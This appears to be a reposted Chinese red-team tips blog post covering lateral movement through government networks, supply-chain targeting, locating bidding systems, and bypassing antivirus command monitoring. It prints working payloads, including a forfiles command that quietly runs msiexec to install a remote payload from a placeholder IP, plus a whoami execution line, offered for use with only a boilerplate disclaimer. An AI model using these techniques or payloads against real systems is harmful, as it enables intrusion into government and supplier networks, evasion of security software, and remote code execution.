攻防小技巧

admin 2024年8月22日23:30:08评论40 views字数 837阅读2分47秒阅读模式

1、政*网

通过多个靶标单位并且筛选单位,在C段的存活以及数量。通过其他政*网中的机器进入内网之后去进行横向到目标单位【具体原因就不说了】

2、供应链

如果打不动了可以尝试去打供应链,比如系统下面的供应商。或者说打旁站时候遇到供应商。可以尝试去测一下,会有意想不到的惊喜。

3、招投标

正常情况下招投标的系统名字奇奇怪怪,找的系统十不存一。而且名字也不一定可以这么命名。可以先尝试baidu,投标文件相结合

攻防小技巧

如图所示,但是该网址所表明系统已经无法使用,通过空间测绘引擎查title找到了。成功通过该入口点进去。

4、数字杀软的命令执行绕过

可以使用各种Windows其他程序来执行命令,而不需要调用cmd。例如,Forfiles、程序兼容性助手(pcalua.exe)、WSL(WindowsSubsystem for Linux)组件等可以从命令行界面、运行窗口或通过脚本来调用程序或命令的执行。

微软官方文档:https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc753551(v=ws.11)

默认位置:

C:WINDOWSsystem32forfiles.exe C:WINDOWSSysWOW64forfiles.exe

payload:

forfiles /p c:windowssystem32 /m cmd.exe /c "msiexec.exe /q /i http://xx.xx.xx.xx/cs.txt"

forfiles /p c:windowssystem32 /m cmd.exe /c "whoami"

实际情况中高版本的话需要带上绝对路径才可以执行

攻防小技巧

攻防小技巧

同理,其他的的姿势也可以。最后该命令执行会启一个forfiles.exe进程。而不是cmd.exe巴适得很。

攻防小技巧

如果阅读有益,请多多关注,谢谢,其他的小技巧就之后再说

原文始发于微信公众号(哈拉少安全小队):攻防小技巧

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月22日23:30:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   攻防小技巧https://cn-sec.com/archives/3087463.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息